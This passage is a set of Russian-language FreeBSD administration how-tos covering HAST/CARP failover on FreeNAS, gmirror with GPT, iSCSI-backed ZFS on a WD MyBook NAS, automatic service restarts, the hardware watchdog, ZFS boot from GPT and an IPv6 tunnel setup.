Начиная с FreeBSD 8.1 в состав включена поддержка системы репликации устройств хранения данных HAST (Highly Avalable STorage), позволяющей создавать высоконадежные конфигурации, в которых данные синхронизированы между несколькими узлами. HAST реализован в виде работающего на уровне пользователя демона hastd, использующего стандартный класс GEOM Gate для обработки запросов ввода/вывода. Hastd, обеспечивает синхронную репликацию блочных устройств поверх TCP/IP сетей, независимо от типа накопителя и файловой системы. HAST предусматривает возможность быстрого восстановления после сбоя, причём, при выходе из строя первичного master-узла, его функции могут быть делегированы slave-узлу. После проверки и монтирования UFS раздела или импорта ZFS пула на поврежденном узле, система автоматически синхронизирует внесенные за время восстановления изменения и продолжит работу без потери данных. Для быстрого развёртывания хранилищ удобно использовать дистрибутив FreeNAS. К сожалению в настоящее время FreeNAS не поддерживает HAST из коробки, но так как во FreeNAS используются стандартные компоненты FreeBSD 8.x, ни что не мешает самостоятельно вручную создать и надстроить работу подобных хранилищ. После первой загрузки FreeNAS настроим параметры сетевого доступа и DNS. Первый узел freenas1 будет иметь IP 192.168.137.31, а второй freenas2 - 192.168.137.32. После первичной типовой настройки подключимся к shell. Настройка узла HAST Перемонтируем корневой раздел для обеспечения возможности записи: mount -uw / Создадим массив хранения RAID3 из дисков da1, da2, da3. graid3 label gr0raid3 da1 da2 da3 В итоге будет создано устройство /dev/raid3/gr0raid3 Включим поддержку CARP и активируем демон hastd: cat <<EOF >> /conf/base/etc/rc.conf ifconfig carp0 create ifconfig carp0 vhid 1 pass freenashast 192.168.137.30/24 # enable HAST daemon hastd_enable="YES" EOF Если в директории /boot/kerneldaemon отсутствует модуль if_carp.ko, скопируем его из системы на базе FreeBSD 8.2 или 8.3. Создадим файл конфигурации hast.conf, в котором определим /dev/raid3/gr0raid3 в качестве синхронизируемого между узлами хранилища: cat <<EOF > /conf/base/etc/hast.conf resource freenashast { on freenas1 { local /dev/raid3/gr0raid3 remote freenas2 } on freenas2 { local /dev/raid3/gr0raid3 remote freenas1 } } EOF Копируем hast.conf в директорию /etc и перезагружаем систему: cp /conf/base/etc/hast.conf /etc Создаём хранилище hast: hastctl create freenashast После появления устройства /dev/hast/freenashast назначаем текущему узлу роль первичной системы: hastctl role primary freenashast Создаём zpool в хранилище freenashast zpool create -m /mnt gr0 /dev/hast/freenashast Создаём символическую ссылку на директорию RAID3, чтобы web-интерфейс FreeNAS распознал вручную созданное хранилище: ln -s /dev/hast/freenashast /dev/raid3/gr1raid3 После этого в GUI FreeNAS можно автоматически импортировать раздел gr0 и настроить совместный доступ с использованием штатного web-интерфейса. Настроим демон devd для переключения HAST из режима master в slave и наоборот в зависимости от состояния сетевого линка: cat <<EOF >> /conf/base/etc/devd.conf notify 30 { match "system" "IFNET"; match "subsystem" "carp0"; match "type" "LINK_UP"; action "/usr/local/sbin/carp-hast-switch master"; }; notify 30 { match "system" "IFNET"; match "subsystem" "carp0"; match "type" "LINK_DOWN"; action "/usr/local/sbin/carp-hast-switch slave"; }; EOF Создадим скрипт hast-carp-switch, который будет выполнять переключение режимов: cat <<EOF > /usr/local/sbin/carp-hast-switch #!/bin/sh resources="freenashast" zfspool="gr0" delay=3 log="local0.debug" name="carp-hast" case "$1" in master) logger -p $log -t $name "Switching to primary provider for $resources." # in order to wait for the original primary provider to change role state # otherwise, brain-split may happen sleep $delay for disk in $resources; do # ensure that this storage can be switched while $(pgrep -lf "hastd: $disk \$secondary\$" > /dev/null 2>&1 ); do sleep 1 done # Switch role for each disk hastctl role primary $disk if [ $? -ne 0 ]; then logger -p $log -t $name "Unable to change role to primary for resouce ${disk}." exit 1 fi done # Wait for the /dev/hast/* devices to appear for disk in $resources; do for I in $(jot 60); do [ -c "/dev/hast/${disk}" ] && break sleep 0.5 done if [ ! -c "/dev/hast/${disk}" ] ; then logger -p $log -t $name "GEOM provider /dev/hast/$disk did not appear." exit 1 fi done logger -p $log -t $name "Role for HAST resources switched to primary." logger -p $log -t $name "Importing ZFS pool." zpool import -f $zfspool # restart the enabled services for srv in $(sqlite3 /data/freenas-v1.db "select srv_service from services_services where srv_enable=1" \\ | xargs printf "grep 'bool_.*%s' /etc/rc.conf.local\\n" | sh | awk '{print $2}') do case $srv in winbindd_enable|samba_enable) /etc/local/rc.d/samba restart ;; netatalk_enable) /etc/local/rc.d/netatalk restart ;; proftpd_enable) /etc/local/rc.d/proftpd restart ;; inetd_enable) /etc/rc.d/inetd restart ;; nfs_server_enable) /etc/rc.d/nfsserver restart ;; mountd_enable) /etc/rc.d/mountd restart ;; nfsd_enable) /etc/rc.d/nfsd restart ;; rsyncd_enable) /etc/local/rc.d/rsyncd restart ;; esac done ;; slave) logger -p $log -t $name "Switching to secondary provider for $resources." # stop the running services for srv in $(sqlite3 /data/freenas-v1.db "select srv_service from services_services where srv_enable=1" \\ | xargs printf "grep 'bool_.*%s' /etc/rc.conf.local\\n" | sh | awk '{print $2}') do case $srv in winbindd_enable|samba_enable) /etc/local/rc.d/samba stop ;; netatalk_enable) /etc/local/rc.d/netatalk stop ;; proftpd_enable) /etc/local/rc.d/proftpd stop ;; inetd_enable) /etc/rc.d/inetd stop ;; nfs_server_enable) /etc/rc.d/nfsserver stop ;; mountd_enable) /etc/rc.d/mountd stop ;; nfsd_enable) /etc/rc.d/nfsd stop ;; rsyncd_enable) /etc/local/rc.d/rsyncd stop ;; esac done # export the zfs pool & change role to slave for disk in $resources; do zpool export -f $zfspool sleep $delay hastctl role secondary $disk 2>&1 if [ $? -ne 0 ]; then logger -p $log -t $name "Unable to switch role to secondary for resource $disk." exit 1 fi logger -p $log -t name "Role switched to secondary for resource $disk" done ;; *) logger -p $log -t $name "Usage: $0 " exit 1 ;; esac Поменяем права доступа и перезагрузим систему: chmod +x /usr/local/sbin/carp-hast-switch reboot После перезагрузки вручную установим первичный режим HAST для созданного хранилища: hastctl role primary freenashast Выше представленная инструкция рассчитана на создание master-узла. Для запасного slave-узла, который возьмёт на себя управление в случае сбоя первичного узла, настойка выполняется аналогично, за одним исключением - для интерфейса carp0 должен быть установлен меньший приоритет, чем на master-узле: ifconfig carp0 vhid 1 pass freenashast advskew 100 192.168.137.30/24

Настройка gmirror при использовании GPT во FreeBSD 9 Автор: Mikhail Zakharov [комментарии]

С релизом FreeBSD-9.0, GPT-формат разделов жестких дисков стал, наконец, делом обыденным, ведь даже новый инсталлятор предполагает использование GPT по-умолчанию. Однако в связи с переходом на GPT-разметку дисков возникают и сложности, поскольку очень многое, в том числе и документация, продолжает быть завязано на ныне устаревший механизм MBR-разделов или слайсов. Так, например, к своему огорчению я обнаружил, что большинство разделов Handbook'а посвященных дискам, GEOM-классам и файловым системам изобилуют примерами работ со старыми слайсами, а не используют для этой цели новый формат GPT. Более того, в январе 2012 года, в разделе учебника, посвященного использованию gmirror, я внезапно наткнулся на предостережение, которое прямо указывает на невозможность сочетания FreeBSD-9.x, gmirror и GPT-разметки дисков: Warning: Creating a mirror out of the boot drive may result in data loss if any data has been stored on the last sector of the disk. This risk is reduced if creating the mirror is done promptly after a fresh install of FreeBSD. The following procedure is also incompatible with the default installation settings of FreeBSD 9.X which use the new GPT partition scheme. GEOM will overwrite GPT metadata, causing data loss and possibly an unbootable system. Примечательно, что в русскоязычном варианте Handbook'а часть этого предупреждения относительно использования GPT-разделов вместе с gmirror во FreeBSD-9.x попросту отсутствует. Терзаемый неприятным чувством, что поддержка GPT дисков во FreeBSD далека еще от совершенства, я решил выяснить, действительно-ли в настоящий момент дисковая функциональность FreeBSD-9.0R не может объединить технологии gmirror - программного зеркала (RAID-1) и разделов GPT. Чаще всего gmirror используется в двух вариантах. Первый, это формирование зеркала из "сырых" дисков, с последующим созданием на зеркале разделов и файловых систем. Договоримся для краткости называть его gmirror+GPT. Второй способ предполагает создание одного, или нескольких разделов на диске и последующее зеркалирование этих разделов на другой диск. Этот метод будем называть GPT+gmirror. gmirror+GPT Итак, чтобы при помощи gmirror собрать RAID-1, а затем создать поверх него разделы GPT нам потребуется дистрибутив FreeBSD-9.0R и два установленных в компьютер жестких диска. Рекомендуется, чтобы оба жестких диска были одинаковыми по всем характеристикам: объему, скорости вращения шпинделей, размеру буфера памяти и т.д. И хоть эти условия для применения gmirror не являются обязательными, однако нужно понимать, что в случае использования различия дисков, характеристики зеркала будут определяться худшим диском. К сожалению, в настоящий момент инсталлятор FreeBSD не умеет управлять модулем gmirror, поэтому создавать RAID-1 нам придется своими собственными руками. Для этого загружаемся с инсталляционного диска но, запуская установку, переходим в shell, сразу, как только инсталлятор предоставит нам эту возможность: Попав в командную строку, начинаем подготовку зеркала. Бегло проглядев вывод команды dmesg, обнаруживаем, что в связи с новым именованием устройств во FreeBSD-9.0, в нашем случае диски определились как ada0 и ada1. Ну, раз так, значит так, создадим из них зеркало gm0 и сразу же загрузим его: # gmirror label gm0 ada0 ada1 # gmirror load Теперь в системе появился новый диск - gm0. Убедиться в этом можно посмотрев вывод команды: # ls -la /dev/mirror/gm0 Однако этот диск пока сырой. Поэтому определим для него схему разбиения на разделы, в нашем случае - GPT и сделаем этот диск загрузочным: # gpart create -s gpt mirror/gm0 # gpart bootcode -b /boot/pmbr -p /boot/gptboot -i 1 mirror/gm0 На этом первая часть вмешательства в обычный ход инсталляции FreeBSD может быть закончена. В самом деле, зачем людям работать руками, если инсталлятор со всем остальным может справиться самостоятельно? Поэтому смело набираем exit и выходим из shell'а, чтобы вернуться в инсталлятор, где нам будет предложено установить имя хоста и выбрать компоненты дистрибутива. Далее, когда инсталлятор загрузит редактор разделов, наше программное зеркало будет ему доступно также, как и два физических диска ada0 и ada1. Теперь после нашего краткого вмешательства, инсталлятор беспрепятственно позволит создать на зеркале необходимые разделы. Более того все изменения будут даже динамически отражаться на обеих половинах зеркала: Далее инсталляция пойдет как по маслу в обычном порядке и до своего логического завершения. Когда все закончится, перезагружаемся проверить все-ли мы сделали правильно, но здесь нас поджидает небольшой fail. С прискорбием мы обнаруживаем, что система загрузиться не может: ядро попросту не понимает, что такое gmirror и не видит зеркала. Выругавшись нехорошими словами, снова вставляем инсталляционный диск и загружаемся в так полюбившийся нам shell. Далее загружаем модуль gmirror и, вспомнив, что корневая файловая система находится на gm0p3, монтируем корень в /mnt. # gmirror load # mount /dev/mirror/gm0p3 /mnt Теперь остается добавить модуль gmirror в loader.conf для загрузки его вместе с ядром при старте системы: # echo ‘geom_mirror_load="YES"’ > /mnt/boot/loader.conf На этом действительно все. Перезагружаемся и получаем работоспособную систему. Чтобы убедиться в этом, можно безбоязненно проводить тесты по поочередному отключению дисков. Единственный нюанс, внимательный администратор заметит во время загрузки системы настораживающее предупреждение: gptboot: invalid backup GPT header Andrey V. Elsukov - один из разработчиков FreeBSD объясняет это предупреждение так: "Причина понятна - GPT была создана поверх зеркала. Размер провайдера mirror/gm0 на 1 сектор меньше, чем размер диска, так как gmirror забирает последний сектор для хранения своих метаданных. Загрузчик gptboot ничего не знает о программном зеркале и ищет резервный заголовок GPT в конце диска, а там находятся метаданные gmirror. Тут есть небольшое разногласие между gptboot и GEOM_PART_GPT. Некоторое время назад я изменил алгоритм проверки корректности GPT в GEOM_PART_GPT. А именно, после прочтения основного заголовка GPT и проверки его контрольной суммы, резервный заголовок считывается по хранящемуся в основном заголовке адресу. В случае, когда основной заголовок повреждён, резервный заголовок ищется в конце диска." Как видим из объяснения разработчика, ничего вроде бы страшного не происходит. И хотя у нас отсутствует запасной заголовок GPT в конце диска, это не критично, правда до тех пор, пока все работает. GPT+gmirror Этот вариант отличает от предыдущего тем, что зеркалируетяс не диск целиком, а отдельные его разделы. Как и для первого случая, нам потребуется дистрибутив FreeBSD-9.0R и два жестких диска, установленных в машину. Как и прежде рекомендуется, чтобы диски были полностью одинаковыми. Тем не менее, если случилось так, что один диск больше другого, то инсталляцию FreeBSD лучше проводить на диск меньшего объема. Это поможет избежать лишних расчетов размеров разделов при зеркалировании их с большего диска на меньший. В остальном первоначальная установка FreeBSD-9.0R ничем не отличается от обычной инсталляции по-умолчанию. Вся настройка зеркалирования начинается, в тот момент, когда мы загружаем свежепроинсталлированную систему и попадаем в консоль. Как и в предыдущем случае, диски определились как ada0 и ada1. FreeBSD установлена на меньший по размеру диск - ada0. Первым делом сохраним разметку диска и восстановим её на другом диске: # gpart backup ada0 > ada0.gpt # gpart restore -F /dev/ada1 < ada0.gpt # gpart show Как видно на скриншоте, разделы удачно скопировались и на бОльшем диске осталось 5GB свободного неразмеченного места. Теперь по логике вещей, можно начать зеркалирование разделов. Однако нужно забыть сделать диск ada1 загрузочным, ведь мы зеркалируем не весь диск целиком, а только его разделы. Иначе с выходом из строя ada0, система не сможет загрузится с ada1. Поэтому: # gpart bootcode -b /boot/pmbr -p /boot/gptboot -i 1 ada1 Кроме того, раздел /dev/da0p3 - содержит корневую файловую систему, он смонтирован, и размонтировать его не получится, поэтому в текущем положении изменить его не возможно. Поэтому перезагружаем систему и загружаемся с инсталляционного диска, где привычно уже заходим в shell и на каждом разделе диска ada0 создаем зеркало и загружаем его: # gmirror label -vb round-robin boot /dev/ada0p1 # gmirror label -vb round-robin swap /dev/ada0p2 # gmirror label -vb round-robin root /dev/ada0p3 # gmirror load Итого у нас получаютcя 3 зеркала. Сразу же добавляем к зеркалам по их второй половине: # gmirror insert boot /dev/ada1p1 # gmirror insert swap /dev/ada1p2 # gmirror insert root /dev/ada1p3 Начнется процедура зеркалирования, длительность которой зависит от объема данных и характеристик жестких дисков. Наблюдать за этим увлекательным процессом можно при помощи команды: # gmirror status А пока дожидаемся окончания этого процесса, чтобы зря не терять времени, можно не спеша сделать еще 2 полезные вещи. Первая, добавить модуль gmirror в загрузку ядра: # mount /dev/mirror/root /mnt # echo ‘geom_mirror_load="YES"’ > /mnt/boot/loader.conf И вторая, отредактировать fstab в соответствии с измененными под зеркала именами разделов: # cat /mnt/etc/fstab #Device Mountpoint FStype Options Dump Pass# /dev/mirror/swap none swap sw 0 0 /dev/mirror/root / ufs rw 1 1 На этом все. После окончания синхронизации зеркал, можно перезагрузиться и устроить системе тест, отключая то один диск, то другой. Только главное не увлечься и не забыть, что каждый раз, при возвращении диска в RAID, нужно обязательно дожидаться окончания процесса синхронизации, иначе вы потеряете данные.

Создание масштабируемого хранилища с использованием WD MyBook NAS + FreeBSD + ZFS Автор: Алексей Волков [комментарии]

Вместо предисловия. RAID-Z doesn't require any special hardware. It doesn't need NVRAM for correctness, and it doesn't need write buffering for good performance. With RAID-Z, ZFS makes good on the original RAID promise: it provides fast, reliable storage using cheap, commodity disks. Jeff Bonwick [0] Мое знакомство с FreeBSD состоялось достаточно давно, как только по ряду причин прошла "первая любовь" к свежему на тот момент QNX Momentics. Просто решил взять другую OS для других задач, без всяких аргументов. Но страсть к ZFS возникла практически мгновенно, как только прочитал первые материалы по ней в свете включения кода в HEAD ветку FreeBSD. C тех пор мы не разлучны, а с выходом релиза FreeBSD 8.0, эта привязанность может стать вечной :) К сожалению, уж очень часто так случается, что место на разделе заканчивается, и в случае небольших офисных серверов, это превращается в маленькую трагедию. Завершив переезд на раздел большего размера, остаешься с неприятной мыслью, что этот раз был не последним, а следующий будет сложнее и дороже во всех смыслах этого слова. Относительно недавно, в розничную продажу поступила линейка NAS устройств WD My Book. Я так же обратил на нее внимание, но в первую очередь потому, что в голове промелькнула мысль - "Вот оно недостающее звено для бюджетного решения проблемы серверного пространства", но на тот момент я еще не знал как именно это можно сделать. Общая концепция заключалась в том, чтобы использовать NAS не так как его позиционирует производитель, а в виде блочного устройства. Другими словами ни CIFS/SAMBA ни FTP не нужны, требуется получить блочное устройство в составе FreeBSD но физически расположенное на NAS. И тогда на сцену выйдет ZFS и возьмет его в свои крепкие руки. Вариант с созданием блочного устройства посредством mdconfig поверх подключенной через CIFS точки монтирования, меня категорически не устраивал. Моя цель где то рядом с ggate, AoE (ATA over Ethernet) или iSCSI. Упомянутый выше NAS, является достаточно открытым и работает на базе armv5tejl Linux 2.6.17.14. А значит к нему можно получить доступ по ssh и установить дополнительный софт. Процедурs настройки ssh и репозитария optware можно найти по ссылкам [1] и [2]. К великой радости optware имеет пакет для предоставления блочного устройства по протоколу AoE, но радость была не долгой, так как все попытки получить AoE на стороне FreeBSD, оказались не удачными. Существующий AoE порт CORAID [3] я так и не смог заставить работать во FreeBSD 8, а мои вопросы к автору порта по email пока остались без ответа. Возвращаться к ядрам 7.X или тем более 6.X не имело смысла, так как терялась ZFS. Вспомнил про гору и Мухамеда, и выяснил что FreeBSD прекрасно дружит с iSCSI и все необходимое уже присутствует в базовой системе. Остается как то организовать iSCSI target на стороне NAS. Перепробовав массу вариантов собрать из исходников iSCSI target ( [4] [5] [6]), я практически отчаялся, пока не вспомнил, что FreeBSD имеет простенький порт net/iscsi-target. На удивление все собралось из исходников с первой попытки и у меня на руках оказался готовый бинарник iscsi-target [8] для ARM LINUX который я положил на NAS в /opt/sbin. Дело техники. В качестве iSCSI носителя будем использовать целиком раздел, который ранее выделялся для CIFS (/dev/md4) для чего нужно в /etc/init.d/network_servers.sh отключить запуск samba.sh и закоментить в /etc/fstab #/dev/md4 /shares/internal ext3 defaults,noatime 0 2 Узнаем полный объем md4. [root@BACKUP]# fdisk -l /dev/md4 Disk /dev/md4: 1992.0 GB, 1992096874496 bytes 2 heads, 4 sectors/track, 486351776 cylinders Units = cylinders of 8 * 512 = 4096 bytes fdisk показал размер 1992096874496. Опытным путем выяснилось, что в конфигурации iscsi-targe нужно указать на 1 меньше. Подготовим конфигурацию для iSCSI /etc/iscsi/targets extent0 /dev/md4 0 1992096874495 target0 rw extent0 192.168.0.0/24 а так же скрипт автоматического запуска сервиса iSCSI /etc/init.d/iscsi.sh [9] и добавляем его запуск в список сервисов /etc/init.d/network_servers.sh. Перезагружаем NAS. Настройка iSCSI initiator На стороне сервера FreeBSD (где будем организовывать ZFS пул) настраиваем инициатор. Утилитой iscontrol выясняем какое имя у нашего target. server# iscontrol -d targetaddress=nas.ip-or-hostname TargetName=iqn.1994-04.org.netbsd.iscsi-target:target0 TargetAddress=192.168.0.1:3260,1 Так как в теории устройств NAS у нас должно быть много, их как то надо идентифицировать. Для целей идентификации MAC адрес подходит как нельзя кстати, тем более что он указан на корпусе NAS. Дополнительно можно намекнуть на объем устройство, и тогда получим идентификаторы вида 00:90:a9:0d:f3:72-2T 00:90:a9:3d:e3:7a-512G Cоздаем /etc/iscsi.conf # # Globals # port = 3260 # 00:90:a9:0d:f3:72-2T { # nickname targetaddress = nas.ip-or-hostname targetname = iqn.1994-04.org.netbsd.iscsi-target:target0 } Я не нашел штатных настроек FreeBSD для автозапуска инициатора, по этому добавил скрипт /usr/local/etc/rc.d/iscsiinitiator # PROVIDE: iscsiinitiator # REQUIRE: DAEMON # AFTER: NETWORK . /etc/rc.subr name="iscsiinitiator" rcvar=`set_rcvar` start_cmd=iscsi_start iscsi_start() { echo Start iSCSI initiator daemon -f iscontrol -c /etc/iscsi.conf -n 00:90:a9:0d:f3:72-2T } # read settings, set default values load_rc_config "$name" : ${iscsiinitiator="NO"} run_rc_command "$1" и соотвесвенно, требуется добавить в /etc/rc.conf строчку iscsiinitiator_enable="YES" Итак запускаем приемную часть iSCSI server# /usr/local/etc/rc.d/iscsiinitiator start Start iSCSI initiator В dmesg долны появится строки вида da0 at iscsi0 bus 0 target 0 lun 0 da0: <NetBSD NetBSD iSCSI 0> Fixed Direct Access SCSI-3 device Что означает что весь процесс пройден верно. Подготовка блочного устройства для включенияв общий пул Размечаем устройсво da0 средствами gpart server# gpart create -s gpt da0 server# gpart add -t freebsd-zfs -l 00:90:a9:0d:f3:72-2T da0 Проверяем что наше устройство корректно отобразилось в /dev/gpt server# ls /dev/gpt 00:90:a9:0d:f3:72-2T ... ... ... Создаем zfs пул server# zpool create -m /mnt/big-storage storage0 /dev/gpt/00:90:a9:0d:f3:72-2T И вот, наш пул готов! server# zpool list NAME SIZE USED AVAIL CAP HEALTH ALTROOT storage0 1,80T 72K 1,80T 0% ONLINE - Заключение Мои поверхностные тесты показали скорость работы данного пула, близкие к максимальным возможностям самой среды FastEthernet. Т.е. 5-6Mbyte/sec, что в моих обстоятельствах является более чем достаточном. Дополнительно стоит отметить, что с увеличением количества устройств в пуле, скорость так же будет расти (если конечно серверный порт и коммутатор гигабитные). P.S. Данный пример, своей целью имеет демострацию именно последовательности действий, а не рекомендуемый вариант использования. В реальных условиях нужно создавать пул из нескольких NAS устройств и объединять их в единый RAID-Z с одиночной или двойной точкой отказа. Но в любом случае последующая ситуация с отказом NAS устройства, или увеличением общего объема, будет заключаться в подготовке NAS для работы по iSCSI и добавлением его в ZFS пул, что представляется достаточно тривиальным и не зависящим от общего объема пула. Не маловажным остается тот факт, что все работы проводятся без остановки сервисов или тем белее перезагрузок. Дополнительное пространство просто появляется и начинает работать на Вас! [0] http://blogs.sun.com/bonwick/entry/raid_z [1] http://mybookworld.wikidot.com/ssh-enable [2] http://mybookworld.wikidot.com/optware [3] http://support.coraid.com/support/freebsd/ [4] http://www.open-iscsi.org/ [5] http://linux-iscsi.sourceforge.net/ [6] http://iscsitarget.sourceforge.net/ [7] http://www.freshports.org/net/iscsi-target/ [8] http://softlynx.ru/pub/WD-MyBook-NAS/iscsi-target [9] http://softlynx.ru/pub/WD-MyBook-NAS/iscsi.sh

Автоматический перезапуск служб во FreeBSD Автор: Алексей Волков [комментарии]

В процессе установки ПО для FreeBSD "правильные" службы автоматически прописывают скрипт запуска в /usr/local/etc/rc.d и управление его поведением определяется в /etc/rc.conf Однако случается так что успешно запустившись при включении сервера, служба по ряду причин падает позже в процессе работы (такое случается например c dovecot или squid). В результате чего как минимум требуется перезапуск с последующим анализом причин поведения. Про анализ причин поведения отдельная песня, а вот перезапускать в таких редких случаях ручками может получиться с изрядными задержками, пока не выяснится, что что-то перестало работать. На этот счет я практикую запуск через cron команды которая проверяет все сконфигурированные к запуску скрипты /usr/local/etc/rc.d на предмет поддержки команды status и если эта команда возвращает отрицательный результат (т.е. сервис не активен) то заново запускает его. Итого в файле /var/cron/tabs/root значится строка */5 * * * * /usr/bin/find /usr/local/etc/rc.d/ -type file | xargs -I$ sh -c "($ 2>&1 | grep -q -v status) \ && exit ; ($ status > /dev/null) && exit ; $ start" В итоге, если служба остановилась, она будет перезапущена в течении 5 минут, и на root придет сообщение с логом запуска (если конечно почтовая подсистема настроена)

Использование аппаратного "watchdog" во FreeBSD Автор: Дмитрий Иванов [комментарии]

Некоторые материнские платы снабжены специальным устройством, делающим жесткую перезагрузку, если ОС не "дернула" вовремя это устройство. Называется оно "hardware watchdog timer". Таким образом, автоматическая и неминуемая перезагрузка гарантируется при "зависании" ОС. В частности, watchdog timer имеется на многих материнских платах Intel, причем не только на серверных. Соответствующий драйвер FreeBSD называется ichwd. Итак, если у нас материнка Intel, попробуем сделать так: kldload ichwd В сообщениях ядра (их можно посмотреть командой dmesg) при этом увидим что-то вроде: ichwd0: <Intel ICH9R watchdog timer> on isa0 ichwd0: Intel ICH9R watchdog timer (ICH9 or equivalent) Теперь ясно, что у нас действительно есть такой таймер. Действуем дальше. Для автоматической загрузки драйвера добавляем в /boot/loader.conf: ichwd_load="YES" Для запуска демона, "дергающего" watchdog, добавляем в /etc/rc.conf: watchdogd_enable="YES" Этот демон будет периодически "дергать" таймер, сообщая ему, что система все еще жива. Будьте осторожны с этим демоном! Если убить его как обычно (т.е. 15-м сигналом), он аккуратно снимет таймер с "боевого дежурства". Но если убить его 9-м сигналом, то таймер перестанет получать наши сигналы, и решит, что система зависла. Произойдет перезагрузка. Иногда watchdog надо включить в BIOS. На некоторых платах watchdog есть, но воспользоваться им невозможно. Иногда при инициализации драйвера появляется ругань на параллельный порт, но ее можно игнорировать. Проверено на FreeBSD 7.1-BETA2.

Настройка загрузки ZFS с GPT-раздела во FreeBSD и создание зеркала (доп. ссылка 1) Автор: unknown [комментарии]

Во FreeBSD 8-CURRENT недавно появилась поддержка загрузки ядра с ZFS, а сама файловая система была обновлена до версии 13. Процесс развертывания ZFS с возможностью загрузки с нее очень простой: 1. Собираете world с LOADER_ZFS_SUPPORT и kernel с поддержкой gpart(8): # добавляем в make.conf(5) опцию поддержки ZFS для loader(8) echo LOADER_ZFS_SUPPORT=yes >>/etc/make.conf # собираем world... нет, только loader(8) и загрузочный код cd /usr/src/sys/boot make cleandir; make cleandir make obj depend all install # добавляем поддержку таблиц разделов для gpart(8) cat MYKERNEL include GENERIC nooption GEOM_BSD nooption GEOM_MBR options GEOM_PART_BSD options GEOM_PART_MBR options GEOM_PART_GPT # собираем kernel make kernel KERNCONF=MYKERNEL -C/usr/src 2. Размечаете первый диск командой gpart(8) на несколько разделов, из которых обязательны только freebsd-boot и freebsd-zfs: # создаем таблицу разделов типа GPT на диске ad0 gpart create -s GPT ad0 # добавляем загрузочный код, позволяющий загружаться с GPT разделов gpart bootcode -b /boot/pmbr ad0 # создаем раздел для кода загрузки loader(8)'а с раздела GPT gpart add -b 34 -s 256 -t freebsd-boot ad0 # записываем загрузочный код на него gpart bootcode -p /boot/gptzfsboot -i 1 ad0 # создаем swap раздел для возможности использовать его # в качестве dumpdev, т.к. делать kernel dump'ы на zvol'ах # невозможно gpart add -b 290 -s 2097152 -t freebsd-swap ad0 # создаем основной раздел для ZFS gpart add -b 2097442 -s 232344173 -t freebsd-zfs ad0 # смотрим на результат gpart show => 34 234441581 ad0 GPT (112G) 34 256 1 freebsd-boot (128K) 290 2097152 2 freebsd-swap (1.0G) 2097442 232344173 3 freebsd-zfs (111G) 3. Создаете pool для ZFS на первом разделе и загружаетесь с него: # создаем pool с именем `h', выключенном поддержкой # времени последнего доступа и включенным сжатием данных zpool create -O atime=off -O compression=on h ad0p3 # создаем необходимые dataset'ы zfs create -p -o setuid=off -o utf8only=on h/usr/home zfs create -o sharenfs='-alldirs -webnfs' h/usr/ports zfs create -o atime=on h/var zfs create -o readonly=on h/var/empty # населяем pool[1] rsync -aHS --del --fileflags --filter 'merge migrate.rsync' / /h/ # перезагружаемся shutdown -r now # загружаемся *не* с ZFS в single-user режим (loader prompt) boot -s # меняем точку монтирования pool'а на корень /etc/rc.d/hostid restart /sbin/zfs set mountpoint=/ h # перезагружаемся /sbin/reboot # загружаемся с ZFS (loader prompt) load zfs set vfs.root.mountfrom=zfs:h boot # добавляем в loader.conf(5) поддержку zfs и точку # монтирования / (корня) echo zfs_load=YES >>/boot/loader.conf echo vfs.root.mountfrom=\"zfs:h\" >>/boot/loader.conf 4. Повторяете шаг 1 для второго диска и подсоединяете его к "зеркалу": # Размечаем диск с учетом того, что количество блоков # у freebsd-zfs должно быть такое же, как и на первом диске. # В даннном примере - 484200428. => 34 488394988 ad0 GPT (233G) 34 256 1 freebsd-boot (128K) 290 4194304 2 freebsd-swap (2.0G) 4194594 484200428 3 freebsd-zfs (231G) => 34 488397101 ad1 GPT (233G) 34 256 1 freebsd-boot (128K) 290 4196417 2 freebsd-swap (2.0G) 4196707 484200428 3 freebsd-zfs (231G) # подсоединяете его к pool'у как элемент зеркала # (не перепутайте с *add*) zpool attach h ad0p3 ad1p3 # смотрим на результат zpool status pool: h state: ONLINE scrub: none requested config: NAME STATE READ WRITE CKSUM h ONLINE 0 0 0 mirror ONLINE 0 0 0 ad0p3 ONLINE 0 0 0 ad1p3 ONLINE 0 0 0 errors: No known data errors Примечание: Тест проводился на 14 версии и с использованием вот этого патча - http://pastebin.com/f3d2089f3 [1] пример migrate.rsync: exclude .ccache exclude /h exclude /dev exclude /nfs exclude /tmp exclude /var/emtpy exclude /var/run Стоит не забыть потом создать эти директории в /h с соответствующими правами на них. В частности без /dev система не загрузится.

Подключение FreeBSD к IPv6 - поднимаем туннель через IPv4-сети провайдера (доп. ссылка 1) Автор: Litos [комментарии]

Итак, пришло время поднять IPv4-IPv6 gateway, чтобы ходить в мир "другого интернета", коим он скоро будет. Самым простым способом получить IPv6 адрес оказалось получить подключение от http://go6.net Идем на этот сайт и регистрируемся http://go6.net/4105/register.asp Тут же они предлагают скачать софт и поставить, например для Windows вида "скачай и запусти" http://go6.net/4105/download.asp Но это не совсем наш метод, мы будем подключать сервер на FreeBSD 7.0 к этой сети. Ядро у нас собрано с поддержкой IPV6, т.е. с options INET6 (ядро GENERIC уже поддерживает этот протокол и если вы его не отключали, значит, он у вас есть) Итак, ставим клиента, то, что они предлагают скачивать - есть в портах Port: gateway6-5.0_2 Path: /usr/ports/net/gateway6 Info: Gateway6 Tunnel Setup Protocol Client - Free IPv6 tunnel B-deps: R-deps: WWW: http://www.go6.net/ Приступаем к установке: cd /usr/ports/net/gateway6 make install clean Буквально через несколько минут клиент будет установлен Отредактируйте его конфигурационный файл /usr/local/etc/gw6c.conf userid= passwd= Пропишите туда ваше имя и пароль которые указали при регистрации на сайте. На этом начальная настройка закончена, для дальнейшей настройки читайте документацию. Как я понял, выдается целая сеть и для авторизованных пользователей http://go6.net/4105/freenet.asp, тем самым можно все компьютеры дома подключить на реальные статические IPv6 адреса. server=broker.freenet6.net broker.freenet6.net - это имя сервера для подключения (написано в письме при регистрации) # Включить использование авторизации auth_method=any # Писать логи в syslogd log_syslog=3 Теперь осталось запустить его echo 'gateway6_enable="YES"' >> /etc/rc.conf /usr/local/etc/rc.d/gateway6 start И смотрим # tail -f /var/log/messages Oct 17 18:39:38 lola gw6c: Gateway6 Client v5.0-RELEASE build Oct 17 2008-14:56:32 Oct 17 18:39:38 lola gw6c: Establishing connection to tunnel broker broker.freenet6.net using reliable UDP. Oct 17 18:39:42 lola gw6c: Connection to broker.freenet6.net established. Oct 17 18:39:45 lola gw6c: Authentication success. Oct 17 18:39:45 lola gw6c: Got tunnel parameters from server. Setting up local tunnel. Oct 17 18:39:45 lola gw6c: Executing configuration script: /bin/sh "/usr/local/share/gateway6/freebsd.sh". Oct 17 18:39:46 lola gw6c: Script completed successfully. Oct 17 18:39:46 